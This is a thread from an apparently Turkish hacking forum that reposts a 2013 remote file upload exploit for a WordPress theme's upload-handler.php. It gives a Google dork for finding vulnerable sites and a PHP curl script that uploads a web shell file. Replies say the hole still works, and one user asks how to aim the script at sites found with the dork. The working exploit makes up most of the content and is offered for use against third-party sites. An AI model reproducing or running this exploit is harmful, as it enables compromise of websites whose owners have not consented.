Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress Theme Kernel Shell Upload
#1
#####
# Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 6/11/2013
# Vendor Homepage: http://www.wikmag.com/
# Themes Link: http://themeforest.net/item/kernel-premi...me-/857077
# Infected File: upload-handler.php
# Category: webapps
# Google dork: inurl:/wp-content/themes/kernel-theme/
# Tested on : Windows/Linux
#####


# Exploit


Kod:
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>

http://127.0.0.1/wordpress/wp-content/up...upload.php
Beğenenler:
#2
Abi Eline Sağlık da Aradan 1 Yıl Geçmiş Yav Kötü Olmuş exciting
Beğenenler:
#3
eline saglık halen aktif bir acık teşekurler.
Beğenenler:
#4
baskan buna shell kendi localhostumuzdanmı upload edicez.

php ile bu kısmı http://127.0.0.1 dork ile taradığımız sitenin adresi ile degisip bu kodlarıda

<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>


upload.php olarak kaydedip öylemi çalısıcagız ...


yanlısmı anlamısım yoksa.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TimThumb Dorkları + Cyberizme Özel KingSkrupellos 75 4,416 07-12-2016, Saat: 18:14
Son Yorum: TiqReGo
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 200 05-12-2016, Saat: 18:42
Son Yorum: the_zizil
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 544 03-12-2016, Saat: 00:10
Son Yorum: Slowycan
  sacro CMS unrestricted upload You LosT 3 194 30-11-2016, Saat: 02:51
Son Yorum: 0xfans
  WordPress store theme Upload Acıgı archavin 72 4,783 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
Anahtar Kelimeler

WordPress Theme Kernel Shell Upload indir, WordPress Theme Kernel Shell Upload Videosu, WordPress Theme Kernel Shell Upload Online izle, WordPress Theme Kernel Shell Upload Bedava indir, WordPress Theme Kernel Shell Upload Yükle, WordPress Theme Kernel Shell Upload Hakkında, WordPress Theme Kernel Shell Upload Nedir, WordPress Theme Kernel Shell Upload Free indir, WordPress Theme Kernel Shell Upload Oyunu, WordPress Theme Kernel Shell Upload Download


1 Ziyaretçi